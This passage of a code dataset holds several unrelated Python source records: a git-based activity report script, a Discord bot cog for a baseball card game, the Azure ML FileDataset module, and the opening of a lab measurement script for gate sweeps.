linhasAdicionados = loginfoAdicionados.split('\\n')\n\n                if len(linhasAdicionados) > 0:\n                    arquivosNovos = arquivosNovos + list(map(lambda x: foldername + x.replace('A\\t','') + 
'#' + commit[0:10], linhasAdicionados))\n\n            print(\"Coletando dados dos arquivos modificados...\")\n            for commit in commitsList:\n                loginfoModificados = g.execute([\"git\", \"show\", commit,\"--name-status\",\"--pretty=oneline\",\"--abbrev-commit\",\"--diff-filter=M\"])\n                linhasModificados = loginfoModificados.split('\\n')\n\n                if len(linhasModificados) > 0:\n                    arquivosModificados = arquivosModificados + list(map(lambda x: foldername + x.replace('MM\\t','').replace('M\\t','') + '#' + commit[0:10], linhasModificados))\n\n            arquivosNovosSet = set(arquivosNovos)\n            arquivosModificadosSet = set(arquivosModificados)\n\n            for novo in arquivosNovos:\n                arquivo = novo[:novo.index(\"#\")]\n\n                if (arquivo != foldername and arquivo.find(\".\")):\n                    iguais = set(filter(lambda nome: search(arquivo, nome), arquivosModificados))\n                    try:\n                        arquivosModificadosSet = arquivosModificadosSet.difference(iguais)\n                    except ValueError:\n                        pass\n\n            arquivosNovos = list(arquivosNovosSet)\n            arquivosModificados = list(arquivosModificadosSet)\n\n            arquivosNovos.sort(key=lambda f: os.path.splitext(f)[1])\n            arquivosModificados.sort(key=lambda f: os.path.splitext(f)[1])\n\n            print(\"=\"*40)\n            print('_____________Arquivos Novos_____________')\n            print(\"=\"*40)\n            extensaoAnterior = ''\n            for x in arquivosNovos:\n                extensao = os.path.splitext(x)[1].split('#')[0]\n                if extensao != extensaoAnterior:\n                    extensaoAnterior = extensao\n                    print('##Arquivos com extensão ' + extensaoAnterior)\n                if (extensao != \"\"):\n                    print(x.strip(\" \"))\n\n            print(\"=\"*40)\n            print('__________Arquivos Modificados__________')\n            print(\"=\"*40)\n            extensaoAnterior = ''\n            for x in arquivosModificados:\n                extensao = os.path.splitext(x)[1].split('#')[0]\n                if extensao != extensaoAnterior:\n                    extensaoAnterior = extensao\n                    print('##Arquivos com extensão ' + extensaoAnterior)\n                if (extensao != \"\"):\n                    print(x)\n\n        except Exception as e:\n            print(\"Ocorreu uma exceção durante a execução do programa, provavelmente o filtro informado não retornou dados: \" + str(e))","sub_path":"gerador-relatorio-atividades.py","file_name":"gerador-relatorio-atividades.py","file_ext":"py","file_size_in_byte":8726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"390061827","text":"import discord\r\nimport pygsheets\r\nfrom db_engine import *\r\nfrom discord.ext import commands\r\nfrom difflib import get_close_matches\r\n\r\n\r\nclass Players(commands.Cog):\r\n    def __init__(self, bot):\r\n        self.bot = bot\r\n        self.helpers = self.bot.get_cog('Helpers')\r\n\r\n    @commands.command(name='show', aliases=['card', 'player'], help='show ')\r\n    @commands.has_any_role('Paper Dynasty Players')\r\n    async def display_player(self, ctx, cardset, *, name):\r\n        if ctx.message.channel.name != 'pd-bot-hole':\r\n            await ctx.send('Slide on down to my bot-hole for running commands.')\r\n            await ctx.message.add_reaction('❌')\r\n            return\r\n\r\n        yp_query = Player.select(Player.name).where(Player.cardset == cardset)\r\n        yearly_players = []\r\n        for x in yp_query:\r\n            yearly_players.append(x.name.lower())\r\n\r\n        try:\r\n            great_match = get_close_matches(name.lower(), yearly_players, cutoff=0.75)[0]\r\n            this_guy = Player.get((fn.Lower(Player.name) == great_match.lower()), Player.cardset == cardset)\r\n\r\n            embed = await self.helpers.get_player_embed(this_guy)\r\n\r\n            await self.helpers.send_to_bothole(ctx, None, embed)\r\n\r\n        except Exception as e:\r\n            await ctx.send(f'I could not find {name.title()}. 
Is that the right year?')\r\n print(f'**ERROR** (display_player): {e}')\r\n\r\n @commands.command(name='roster', aliases=['team'], help='Show your active roster')\r\n @commands.has_any_role('Paper Dynasty Players')\r\n async def get_inventory(self, ctx, *abbrev):\r\n if ctx.message.channel.name != 'pd-bot-hole':\r\n await ctx.send('Slide on down to my bot-hole for running commands.')\r\n await ctx.message.add_reaction('❌')\r\n return\r\n\r\n if abbrev:\r\n team = Team.get_or_none(Team.abbrev == abbrev[0].upper())\r\n if not team:\r\n await ctx.send(f'I couldn\\'t find **{abbrev}**. Is that the team\\'s abbreviation?')\r\n return\r\n else:\r\n team = Team.get_by_owner(ctx.author.id)\r\n if not team:\r\n await ctx.send(f'What team are you searching for?')\r\n return\r\n\r\n embed = self.helpers.get_active_roster(team, f'{self.bot.get_user(team.gmid).avatar_url}')\r\n\r\n await self.helpers.send_to_bothole(ctx, content=f'{ctx.author.mention}', embed=embed)\r\n\r\n @commands.command(name='in', help='Get Paper Dynasty Players role')\r\n async def give_role(self, ctx, *args):\r\n await ctx.author.add_roles(discord.utils.get(ctx.guild.roles, name='Paper Dynasty Players'))\r\n await ctx.send('I got u, boo. ;)')\r\n\r\n @commands.command(name='out', help='Remove Paper Dynasty Players role')\r\n @commands.has_any_role('Paper Dynasty Players')\r\n async def take_role(self, ctx, *args):\r\n await ctx.author.remove_roles(discord.utils.get(ctx.guild.roles, name='Paper Dynasty Players'))\r\n await ctx.send('Oh no! I\\'m so sad to see you go! What are we going to do without you?')\r\n\r\n @commands.command(name='teams', help='List all teams')\r\n @commands.has_any_role('Paper Dynasty Players')\r\n async def list_teams(self, ctx, *args):\r\n if ctx.message.channel.name != 'pd-bot-hole':\r\n await ctx.send('Slide on down to my bot-hole for running commands.')\r\n await ctx.message.add_reaction('❌')\r\n return\r\n\r\n all_teams = Team.select()\r\n\r\n # Collect rarity objects\r\n try:\r\n rar_mvp = Rarity.get(Rarity.name == 'MVP')\r\n rar_als = Rarity.get(Rarity.name == 'All-Star')\r\n rar_sta = Rarity.get(Rarity.name == 'Starter')\r\n rar_res = Rarity.get(Rarity.name == 'Reserve')\r\n rar_rpl = Rarity.get(Rarity.name == 'Replacement')\r\n except Exception as e:\r\n print(f'**Error**: (players inv getrars) - {e}')\r\n return\r\n\r\n embed = discord.Embed(title='All Teams', color=0xdeeadd)\r\n\r\n # Build embed\r\n for x in all_teams:\r\n mvps, alss, stas, ress, reps = 0, 0, 0, 0, 0\r\n roster = Roster.get_cards(team=x)\r\n\r\n for p in roster:\r\n if p.player.rarity == rar_mvp:\r\n mvps += 1\r\n elif p.player.rarity == rar_als:\r\n alss += 1\r\n elif p.player.rarity == rar_sta:\r\n stas += 1\r\n elif p.player.rarity == rar_res:\r\n ress += 1\r\n else:\r\n reps += 1\r\n\r\n un_packs = Pack.select(Pack.id).where((Pack.team == x) & (Pack.card1.is_null())).count()\r\n op_packs = Pack.select(Pack.id).where((Pack.team == x) & (Pack.card1.is_null(False))).count()\r\n\r\n embed.add_field(\r\n name=f'{x.lname}',\r\n value=f'GM: {x.gmname}\\n'\r\n f'Packs (Unopen): {op_packs + un_packs} ({un_packs})\\n\\n'\r\n f'MVPs: {mvps}\\n'\r\n f'All-Stars: {alss}\\n'\r\n f'Starters: {stas}\\n'\r\n f'Reserves: {ress}\\n'\r\n f'Replacements: {reps}\\n------\\n'\r\n f'Collection Value: {self.helpers.get_team_value(x)}')\r\n\r\n await self.helpers.send_to_bothole(ctx, content=f'{ctx.author.mention}', embed=embed)\r\n\r\n @commands.command(name='result', help='Log your game results')\r\n @commands.has_any_role('Paper Dynasty 
Players')\r\n    async def result(self, ctx, awayabbrev: str, awayscore: int, homeabbrev: str, homescore: int):\r\n        # Validate teams listed\r\n        try:\r\n            awayteam = Team.get(Team.abbrev == awayabbrev.upper())\r\n            hometeam = Team.get(Team.abbrev == homeabbrev.upper())\r\n            print(f'Final: {awayabbrev} {awayscore} - {homescore} {homeabbrev}')\r\n        except Exception as e:\r\n            error = f'**ERROR:** {type(e).__name__} - {e}'\r\n            print(error)\r\n            await ctx.message.add_reaction('❌')\r\n            await ctx.send(f'Hey, {ctx.author.mention}, I couldn\\'t find the teams you mentioned. You put '\r\n                           f'**{awayabbrev}** as the away team and **{homeabbrev}** as the home team.')\r\n            return\r\n\r\n        earnings = {'away': 0, 'home': 0}\r\n        earnings_away = []\r\n        earnings_home = []\r\n\r\n        # Check author then log result\r\n        if ctx.author.id in [awayteam.gmid, awayteam.gmid2, hometeam.gmid, hometeam.gmid2] \\\r\n                or ctx.author.id == self.bot.owner_id:\r\n            this_result = Result(week=Current.get_by_id(1).week,\r\n                                 awayteam=awayteam, hometeam=hometeam,\r\n                                 awayscore=awayscore, homescore=homescore,\r\n                                 season=Current.get_by_id(1).season)\r\n            this_result.save()\r\n            await self.helpers.pause_then_type(ctx, f'Just logged {awayteam.abbrev.upper()} {awayscore} - '\r\n                                                    f'{homescore} {hometeam.abbrev.upper()}')\r\n            await ctx.message.add_reaction('✅')\r\n\r\n            # Credit pack for win\r\n            if awayscore > homescore:\r\n                earnings['away'] += 1\r\n                earnings_away.append('- 1 pack for the win\\n')\r\n            else:\r\n                earnings['home'] += 1\r\n                earnings_home.append('- 1 pack for the win\\n')\r\n\r\n            away_team_value = self.helpers.get_team_value(awayteam)\r\n            home_team_value = self.helpers.get_team_value(hometeam)\r\n            delta = away_team_value - home_team_value\r\n            if delta < 0:\r\n                increments = divmod(-delta, self.helpers.TEAM_DELTA_CONSTANT)\r\n                print(f'increments: {increments}')\r\n                packs = min(increments[0], 5)\r\n                if packs > 0:\r\n                    earnings['away'] += packs\r\n                    earnings_away.append(f'- {packs} pack{\"s\" if packs > 1 else \"\"} for underdog\\n')\r\n            else:\r\n                increments = divmod(delta, self.helpers.TEAM_DELTA_CONSTANT)\r\n                print(f'increments: {increments}')\r\n                packs = min(increments[0], 5)\r\n                if packs > 0:\r\n                    earnings['home'] += packs\r\n                    earnings_home.append(f'- {packs} pack{\"s\" if packs > 1 else \"\"} for underdog\\n')\r\n\r\n            print(f'earn away: {earnings[\"away\"]} / earn home: {earnings[\"home\"]}')\r\n            away_packs_remaining = Current.get_by_id(1).packlimit - awayteam.weeklypacks\r\n            home_packs_remaining = Current.get_by_id(1).packlimit - hometeam.weeklypacks\r\n            away_final_earnings = min(earnings[\"away\"], away_packs_remaining)\r\n            home_final_earnings = min(earnings[\"home\"], home_packs_remaining)\r\n            print(f'away_final_earnings: {away_final_earnings}')\r\n            print(f'home_final_earnings: {home_final_earnings}')\r\n\r\n            # cap each payout at the team's remaining weekly pack allowance before crediting\r\n            economy = self.bot.get_cog('Economy')\r\n            if earnings[\"away\"] > 0:\r\n                print(f'away_final_earnings: {away_final_earnings}')\r\n                economy.give_pack(awayteam, away_final_earnings)\r\n            if earnings[\"home\"] > 0:\r\n                print(f'home_final_earnings: {home_final_earnings}')\r\n                economy.give_pack(hometeam, home_final_earnings)\r\n\r\n            embed = discord.Embed(title=f'{awayteam.sname} {awayscore} - {homescore} {hometeam.sname}',\r\n                                  description='Score Report / Post Game Earnings')\r\n            embed.add_field(name=awayteam.lname,\r\n                            value=f'Team Value: {away_team_value}\\n\\n'\r\n                                  f'**Earn: 
{earnings[\"away\"]} pack{\"s\" if earnings[\"away\"] != 1 else \"\"}**'\r\n f' (limit {away_final_earnings})\\n'\r\n f'{\"Summary:\" if len(earnings_away) > 0 else \"\"}\\n'\r\n f'{earnings_away[0] if len(earnings_away) > 0 else \"\"}'\r\n f'{earnings_away[1] if len(earnings_away) > 1 else \"\"}',\r\n inline=False)\r\n embed.add_field(name=hometeam.lname,\r\n value=f'Team Value: {home_team_value}\\n\\n'\r\n f'**Earn: {earnings[\"home\"]} pack{\"s\" if earnings[\"home\"] != 1 else \"\"}**'\r\n f' (limit {home_final_earnings})\\n'\r\n f'{\"Summary:\" if len(earnings_home) > 0 else \"\"}\\n'\r\n f'{earnings_home[0] if len(earnings_home) > 0 else \"\"}'\r\n f'{earnings_home[1] if len(earnings_home) > 1 else \"\"}',\r\n inline=False)\r\n await self.helpers.send_to_news(ctx, None, embed)\r\n\r\n @commands.command(name='sheet', aliases=['google'], help='Link to your roster sheet')\r\n @commands.has_any_role('Paper Dynasty Players')\r\n async def get_roster_command(self, ctx):\r\n if ctx.message.channel.name != 'pd-bot-hole':\r\n await ctx.send('Slide on down to my bot-hole for running commands.')\r\n await ctx.message.add_reaction('❌')\r\n return\r\n\r\n team = Team.get_by_owner(ctx.author.id)\r\n if not team:\r\n await ctx.send(f'Do you have a team? I don\\'t see your name here...')\r\n return\r\n\r\n await ctx.send(f'{ctx.author.mention}\\n{team.lname} Roster Sheet: <{self.helpers.get_roster_sheet(team)}>')\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(Players(bot))\r\n","sub_path":"cogs/players.py","file_name":"players.py","file_ext":"py","file_size_in_byte":11527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"97835448","text":"# ---------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# ---------------------------------------------------------\n\n\"\"\"Contains functionality for referencing single or multiple files in datastores or public URLs.\n\nFor more information, see the article [Add & register\ndatasets](https://docs.microsoft.com/azure/machine-learning/how-to-create-register-datasets).\nTo get started working with a file dataset, see https://aka.ms/filedataset-samplenotebook.\n\"\"\"\n\nimport os\nimport re\nimport sys\nimport tempfile\nimport uuid\n\nfrom azureml._common.exceptions import AzureMLException\nfrom azureml._tracing import get_tracer\nfrom azureml.data.abstract_dataset import AbstractDataset, _get_path_from_step\nfrom azureml.data._dataprep_helper import dataprep, dataprep_fuse, get_dataflow_for_execution\nfrom azureml.data._loggerfactory import track, _LoggerFactory\nfrom azureml.data.constants import _PUBLIC_API\nfrom azureml.data.dataset_error_handling import _try_execute, _construct_message_and_check_exception_type, \\\n _dataprep_error_handler\nfrom azureml.exceptions import UserErrorException\n\n\n_logger = None\n_tracer = None # type: Optional[AmlTracer]\n\n\ndef _get_logger():\n global _logger\n if _logger is None:\n _logger = _LoggerFactory.get_logger(__name__)\n return _logger\n\n\ndef _get_tracer():\n global _tracer\n if _tracer is None:\n _tracer = get_tracer(__name__)\n return _tracer\n\n\nclass FileDataset(AbstractDataset):\n \"\"\"Represents a collection of file references in datastores or public URLs to use in Azure Machine Learning.\n\n A FileDataset defines a series of lazily-evaluated, immutable operations to load data from the\n data source into file streams. 
Data is not loaded from the source until FileDataset is asked to deliver data.\n\n A FileDataset is created using the :func:`azureml.data.dataset_factory.FileDatasetFactory.from_files` method\n of the FileDatasetFactory class.\n\n For more information, see the article `Add & register\n datasets `_.\n To get started working with a file dataset, see https://aka.ms/filedataset-samplenotebook.\n\n .. remarks::\n\n FileDataset can be used as input of an experiment run. It can also be registered to workspace\n with a specified name and be retrieved by that name later.\n\n FileDataset can be subsetted by invoking different subsetting methods available on this class.\n The result of subsetting is always a new FileDataset.\n\n The actual data loading happens when FileDataset is asked to deliver the data into another\n storage mechanism (e.g. files downloaded or mounted to local path).\n \"\"\"\n\n def __init__(self):\n \"\"\"Initialize the FileDataset object.\n\n This constructor is not supposed to be invoked directly. Dataset is intended to be created using\n :class:`azureml.data.dataset_factory.FileDatasetFactory` class.\n \"\"\"\n super().__init__()\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def to_path(self):\n \"\"\"Get a list of file paths for each file stream defined by the dataset.\n\n .. remarks::\n The file paths are relative paths for local files when the file streams are downloaded or mounted.\n\n A common prefix will be removed from the file paths based on how data source was\n specified to create the dataset. For example:\n\n .. code-block:: python\n\n datastore = Datastore.get(workspace, 'workspaceblobstore')\n dataset = Dataset.File.from_files((datastore, 'animals/dog/year-*/*.jpg'))\n print(dataset.to_path())\n\n # ['year-2018/1.jpg'\n # 'year-2018/2.jpg'\n # 'year-2019/1.jpg']\n\n dataset = Dataset.File.from_files('https://dprepdata.blob.core.windows.net/demo/green-small/*.csv')\n\n print(dataset.to_path())\n # ['/green_tripdata_2013-08.csv']\n\n :return: Returns an array of file paths.\n :rtype: builtin.list(str)\n \"\"\"\n return self._to_path(activity='to_path')\n\n def _to_path(self, activity):\n dataflow, portable_path = _add_portable_path_column(self._dataflow)\n dataflow = get_dataflow_for_execution(dataflow, activity, 'FileDataset')\n records = dataflow._to_pyrecords()\n return [r[portable_path] for r in records]\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def download(self, target_path=None, overwrite=False):\n \"\"\"Download file streams defined by the dataset as local files.\n\n .. remarks::\n\n If target_path starts with a /, then it will be treated as an absolute path. If it doesn't start\n with a /, then it will be treated as a relative path relative to the current working directory.\n\n :param target_path: The local directory to download the files to. If None, the data will be downloaded\n into a temporary directory.\n :type target_path: str\n :param overwrite: Indicates whether to overwrite existing files. The default is False. 
Existing files will\n be overwritten if overwrite is set to True; otherwise an exception will be raised.\n :type overwrite: bool\n :return: Returns an array of file paths for each file downloaded.\n :rtype: builtin.list(str)\n \"\"\"\n with _get_tracer().start_as_current_span('download', user_facing_name='Dataset.download') as span:\n target_path = _ensure_path(target_path)\n download_list = [os.path.abspath(os.path.join(target_path, '.' + p))\n for p in self._to_path(activity='download.to_path')]\n\n if self.id:\n span.set_user_facing_attribute('dataset_id', self.id)\n span.set_user_facing_attribute('target_path', target_path)\n\n if not overwrite:\n for p in download_list:\n # encode p to avoid UnicodeEncodeError from os.path.exists\n if os.path.exists(_encode_if_needed(p)):\n raise UserErrorException('File \"{}\" already exists. Set overwrite=True to overwrite it.'\n .format(p))\n base_path = dataprep().api.datasources.LocalFileOutput(target_path)\n\n dataflow, portable_path = _add_portable_path_column(self._dataflow)\n dataflow = dataflow.write_streams(\n streams_column='Path',\n base_path=base_path,\n file_names_column=portable_path)\n\n dataflow = get_dataflow_for_execution(dataflow, 'download', 'FileDataset')\n _try_execute(dataflow.run_local,\n 'download',\n None if self.id is None else {'id': self.id, 'name': self.name, 'version': self.version})\n return download_list\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def mount(self, mount_point=None, **kwargs):\n \"\"\"Create a context manager for mounting file streams defined by the dataset as local files.\n\n .. remarks::\n\n A context manager will be returned to manage the lifecycle of the mount. To mount, you will need to\n enter the context manager and to unmount, exit from the context manager.\n\n Mount is only supported on Unix or Unix-like operating systems and libfuse must be present. If you\n are running inside a docker container, the docker container must be started with the `--privileged` flag\n or started with `--cap-add SYS_ADMIN --device /dev/fuse`.\n\n .. code-block:: python\n\n datastore = Datastore.get(workspace, 'workspaceblobstore')\n dataset = Dataset.File.from_files((datastore, 'animals/dog/year-*/*.jpg'))\n\n with dataset.mount() as mount_context:\n # list top level mounted files and folders in the dataset\n os.listdir(mount_context.mount_point)\n\n # You can also use the start and stop methods\n mount_context = dataset.mount()\n mount_context.start() # this will mount the file streams\n mount_context.stop() # this will unmount the file streams\n\n If target_path starts with a /, then it will be treated as an absolute path. If it doesn't start\n with a /, then it will be treated as a relative path relative to the current working directory.\n\n :param mount_point: The local directory to mount the files to. 
If None, the data will be mounted into a\n temporary directory, which you can find by calling the `MountContext.mount_point` instance method.\n :type mount_point: str\n :return: Returns a context manager for managing the lifecycle of the mount.\n :rtype: azureml.dataprep.fuse.daemon.MountContext\n \"\"\"\n try:\n mount = dataprep_fuse().mount\n except ValueError as e:\n if 'Invalid mount arguments' in str(e):\n raise UserErrorException(e)\n raise AzureMLException(\"Execution failed unexpectedly due to: {}\".format(str(e)))\n except OSError as e:\n raise UserErrorException('Mount is only supported on Unix or Unix-like operating systems and the '\n 'FUSE library must be present. For more information, please refer to the '\n 'remarks section of FileDataset.mount\\'s documentation. Execution failed'\n 'unexpectedly due to {}'.format(e.__class__.__name__))\n except Exception as e:\n raise AzureMLException(\"Mount failed unexpectedly due to: {}\".format(str(e)))\n\n mount_point = _ensure_path(mount_point)\n if os.path.ismount(mount_point):\n raise UserErrorException('\"{0}\" is already mounted. Run `sudo umount \"{0}\"` to unmount it.'\n .format(mount_point))\n\n if not os.path.exists(mount_point):\n os.makedirs(mount_point)\n\n invocation_id = str(uuid.uuid4())\n dataflow = get_dataflow_for_execution(self._dataflow, 'mount.find_prefix', 'FileDataset',\n invocation_id=invocation_id)\n base_path = _find_path_prefix(dataflow)\n dataflow = get_dataflow_for_execution(self._dataflow, 'mount', 'FileDataset',\n invocation_id=invocation_id)\n mount_options = kwargs.get('mount_options', None)\n skip_validate = kwargs.get('skip_validate', False)\n\n if not skip_validate:\n try:\n is_invalid = dataflow.has_invalid_source(return_validation_error=True)\n if is_invalid is not False: # This means that the source is invalid\n raise UserErrorException(\"Cannot mount Dataset(id='{}', name='{}', version={}). \"\n \"Source of the dataset is either not \"\n \"accessible or does not contain any data. \"\n \"Error Message: {}\".format(self.id, self.name, self.version, is_invalid))\n except TypeError:\n # This catch is for backwards compatibility. There are valid version combinations of dataprep\n # and core where dataflow.has_invalid_source will not have the return_validation_error parameter,\n # which the above call will throw a TypeError.\n if dataflow.has_invalid_source(): # This means that the source is invalid\n raise UserErrorException(\"Cannot mount dataset. Source of the dataset is either not \"\n \"accessible or does not contain any data. \")\n except AttributeError:\n # This catch is for backwards compatibility. 
There are valid version combinations of dataprep\n # and core where Dataflow will not have the has_invalid_source method.\n pass\n except UserErrorException:\n raise\n except AzureMLException:\n raise\n except Exception as e:\n dataset_info = None if self.id is None else {'id': self.id, 'name': self.name, 'version': self.version}\n message, is_dprep_exception = _construct_message_and_check_exception_type(e, dataset_info, \"mount\")\n _logger.error(message)\n _dataprep_error_handler(e, message, is_dprep_exception)\n\n return mount(\n dataflow=dataflow,\n files_column='Path',\n mount_point=mount_point,\n base_path=base_path,\n options=mount_options,\n foreground=False,\n invocation_id=invocation_id)\n\n def as_mount(self, path_on_compute=None):\n \"\"\"Create a DatasetConsumptionConfig with the mode set to mount.\n\n In the submitted run, files in the datasets will be mounted to local path on the compute target.\n The mount point can be retrieved from argument values and the input_datasets field of the run context.\n We will automatically generate an input name. If you would like specify a custom input name, please call\n the as_named_input method.\n\n .. code-block:: python\n\n # Given a run submitted with dataset input like this:\n dataset_input = dataset.as_mount()\n experiment.submit(ScriptRunConfig(source_directory, arguments=[dataset_input]))\n\n\n # Following are sample codes running in context of the submitted run:\n\n # The mount point can be retrieved from argument values\n import sys\n mount_point = sys.argv[1]\n\n # The mount point can also be retrieved from input_datasets of the run context.\n from azureml.core import Run\n mount_point = Run.get_context().input_datasets['input_1']\n\n .. remarks::\n\n When the dataset is created from path of a single file, the mount point will be path of the single mounted\n file. Otherwise, the mount point will be path of the enclosing folder for all the mounted files.\n\n If path_on_compute starts with a /, then it will be treated as an absolute path. If it doesn't start\n with a /, then it will be treated as a relative path relative to the working directory. If you have\n specified an absolute path, please make sure that the job has permission to write to that directory.\n\n :param path_on_compute: The target path on the compute to make the data available at.\n :type path_on_compute: str\n \"\"\"\n return (self\n .as_named_input(name=None)\n .as_mount(path_on_compute=path_on_compute))\n\n def as_download(self, path_on_compute=None):\n \"\"\"Create a DatasetConsumptionConfig with the mode set to download.\n\n In the submitted run, files in the dataset will be downloaded to local path on the compute target.\n The download location can be retrieved from argument values and the input_datasets field of the run context.\n We will automatically generate an input name. If you would like specify a custom input name, please call\n the as_named_input method.\n\n .. code-block:: python\n\n # Given a run submitted with dataset input like this:\n dataset_input = dataset.as_download()\n experiment.submit(ScriptRunConfig(source_directory, arguments=[dataset_input]))\n\n\n # Following are sample codes running in context of the submitted run:\n\n # The download location can be retrieved from argument values\n import sys\n download_location = sys.argv[1]\n\n # The download location can also be retrieved from input_datasets of the run context.\n from azureml.core import Run\n download_location = Run.get_context().input_datasets['input_1']\n\n .. 
remarks::\n\n When the dataset is created from path of a single file, the download location will be path of the single\n downloaded file. Otherwise, the download location will be path of the enclosing folder for all the\n downloaded files.\n\n If path_on_compute starts with a /, then it will be treated as an absolute path. If it doesn't start\n with a /, then it will be treated as a relative path relative to the working directory. If you have\n specified an absolute path, please make sure that the job has permission to write to that directory.\n\n :param path_on_compute: The target path on the compute to make the data available at.\n :type path_on_compute: str\n \"\"\"\n return (self\n .as_named_input(name=None)\n .as_download(path_on_compute=path_on_compute))\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def skip(self, count):\n \"\"\"Skip file streams from the top of the dataset by the specified count.\n\n :param count: The number of file streams to skip.\n :type count: int\n :return: Returns a new FileDataset object representing a dataset with file streams skipped.\n :rtype: azureml.data.FileDataset\n \"\"\"\n return FileDataset._create(self._dataflow.skip(count), self._properties, telemetry_info=self._telemetry_info)\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def take(self, count):\n \"\"\"Take a sample of file streams from top of the dataset by the specified count.\n\n :param count: The number of file streams to take.\n :type count: int\n :return: Returns a new FileDataset object representing the sampled dataset.\n :rtype: azureml.data.FileDataset\n \"\"\"\n return FileDataset._create(self._dataflow.take(count), self._properties, telemetry_info=self._telemetry_info)\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def take_sample(self, probability, seed=None):\n \"\"\"Take a random sample of file streams in the dataset approximately by the probability specified.\n\n :param probability: The probability of a file stream being included in the sample.\n :type probability: float\n :param seed: An optional seed to use for the random generator.\n :type seed: int\n :return: Returns a new FileDataset object representing the sampled dataset.\n :rtype: azureml.data.FileDataset\n \"\"\"\n return FileDataset._create(\n self._dataflow.take_sample(probability, seed), self._properties, telemetry_info=self._telemetry_info)\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def random_split(self, percentage, seed=None):\n \"\"\"Split file streams in the dataset into two parts randomly and approximately by the percentage specified.\n\n The first dataset returned contains approximately ``percentage`` of the total number of file references\n and the second dataset contains the remaining file references.\n\n :param percentage: The approximate percentage to split the dataset by. 
This must be a number between 0.0\n and 1.0.\n :type percentage: float\n :param seed: An optional seed to use for the random generator.\n :type seed: int\n :return: Returns a tuple of new FileDataset objects representing the two datasets after the split.\n :rtype: (azureml.data.FileDataset, azureml.data.FileDataset)\n \"\"\"\n dataflow1, dataflow2 = self._dataflow.random_split(percentage, seed)\n return (\n FileDataset._create(dataflow1, self._properties, telemetry_info=self._telemetry_info),\n FileDataset._create(dataflow2, self._properties, telemetry_info=self._telemetry_info)\n )\n\n\ndef _add_portable_path_column(dataflow):\n prefix_path = _find_path_prefix(dataflow)\n portable_path = 'Portable Path'\n get_portable_path = dataprep().api.functions.get_portable_path\n col = dataprep().api.expressions.col\n return dataflow.add_column(get_portable_path(col('Path'), prefix_path), portable_path, 'Path'), portable_path\n\n\ndef _find_path_prefix(dataflow):\n # TODO: move this logic to Engine\n steps = dataflow._get_steps()\n step_types = [s.step_type for s in steps]\n special_block_types = {'Microsoft.DPrep.ToCsvStreamsBlock',\n 'Microsoft.DPrep.ToParquetStreamsBlock',\n 'Microsoft.DPrep.ToDataFrameDirectoryBlock'}\n if len(special_block_types.intersection(step_types)) > 0:\n return None\n step_type = steps[0].step_type\n step_arguments = steps[0].arguments\n if hasattr(step_arguments, 'to_pod'):\n step_arguments = step_arguments.to_pod()\n path = _get_path_from_step(step_type, step_arguments)\n return None if path is None else _get_prefix(path, dataflow)\n\n\ndef _get_prefix(path, dataflow):\n \"\"\"Determine if there exists a common prefix for all files which may exist under the given path/dataflow.\n\n :param path: Path extracted from dataflow\n :param dataflow: Dataflow to get prefix for.\n :return: Path which is common prefix of all files under path/dataflow, or None if a common prefix was not found.\n \"\"\"\n from azureml.dataprep.api.errorhandlers import ExecutionError\n from azureml.dataprep.api.functions import get_portable_path\n\n if '*' in path:\n return '/'.join(re.split(r'/|\\\\', path.split('*')[0])[:-1])\n\n if path.startswith('http://') or path.startswith('https://'):\n return path[:path.rindex('/')]\n\n dataflow = dataflow.add_column(get_portable_path(dataflow['Path']), 'PortablePath', 'Path')\n paths = []\n try:\n paths = [r['PortablePath'] for r in dataflow.take(1)._to_pyrecords()]\n except ExecutionError as e:\n if 'InvalidPath' in e.error_code or 'NotFound' in e.error_code:\n return None\n raise e\n if len(paths) == 0:\n return None\n if len(paths) == 1 and paths[0].endswith(path):\n return path.replace('\\\\', '/')[:path.rindex('/')]\n return path\n\n\ndef _ensure_path(path):\n if not path or path.isspace():\n return tempfile.mkdtemp()\n return os.path.abspath(path)\n\n\ndef _encode_if_needed(path):\n sys_encoding = sys.getfilesystemencoding() or sys.getdefaultencoding()\n try:\n path.encode(sys_encoding)\n return path # no need to encode\n except (UnicodeError, LookupError):\n # Encode the path string when it contains characters which cannot be encoded by sys encoding.\n # Otherwise, usage of the path string (e.g. 
`os.path.exists(p)`) can encounter UnicodeEncodeError.\n return path.encode('utf8')\n","sub_path":"venv/Lib/site-packages/azureml/data/file_dataset.py","file_name":"file_dataset.py","file_ext":"py","file_size_in_byte":23130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"37587865","text":"''' This program uses KEYSIGHT B2901A to apply a gate voltage and HF2LI lock-in amplifier to measure the resistance of the sample\n\n\n\n\tHardware to be used:\n\t\t- SMU B2901A: For gating\n\t\t- A bias resistance of 1M: As voltage to current converter for lock-in out put.\n\t\t\tNote that there is always errors in reading the resitance of the device; the error is around -33% depending on the gain on S4c (see the excel file \"Calibrate S4c gain.xlsx\").\n\n\t\t- HF2LI: to measure the resistance of graphene device\n\n\n\n\n'''\nimport numpy as np\nimport zhinst.utils\n\nfrom gate_pattern import gate_pattern\n\nimport time\nfrom my_poll import R_measure as R_measure\nimport stlab\nimport os\nfrom stlab.devices.Keysight_B2901A import Keysight_B2901A\nimport matplotlib.pyplot as plt\nimport pygame, sys\nfrom pygame.locals import *\nimport math\n\n#############################################################\n''' Definitions'''\n\n# definitions\ntempdev = 0.015\nprefix = 'F17_e6_0204'\nsample_name = '2probe'\ndevice_id = 'dev352'\ntime_step = 0.1 #time step between each gate voltage steps, to stablize the gate\nramp_speed = 1500 # the safe speed for ramping the gate 